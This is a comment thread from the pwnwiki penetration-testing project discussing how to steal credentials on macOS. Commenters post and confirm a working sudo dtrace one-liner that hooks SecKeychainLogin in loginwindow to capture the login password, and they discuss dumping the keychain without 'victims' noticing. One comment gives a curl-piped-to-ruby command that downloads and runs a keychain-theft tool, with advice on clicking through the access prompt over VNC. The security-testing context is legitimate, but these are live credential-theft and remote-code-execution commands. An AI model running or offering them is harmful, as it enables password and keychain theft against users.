Comments (5)
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
😢
System info:
$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
from pwnwiki.github.io.
@OJ - It was on Twitter so it has to be true!
Seriously though, the first command appears to work on my MBP:
└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')
dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe
And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.
└──> $ uname -a
Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
from pwnwiki.github.io.
hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).
Fun stuff though!
from pwnwiki.github.io.
No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X
from pwnwiki.github.io.
Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby
Coworker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again, you need to click allow, which means you need GUI access, but I have pulled that off remotely with VNC. Not super stealthy but gets the job done.
Leon Johnson
On Jun 25, 2015, at 6:48 AM, OJ Reeves [email protected] wrote:
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
System info:
$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
from pwnwiki.github.io.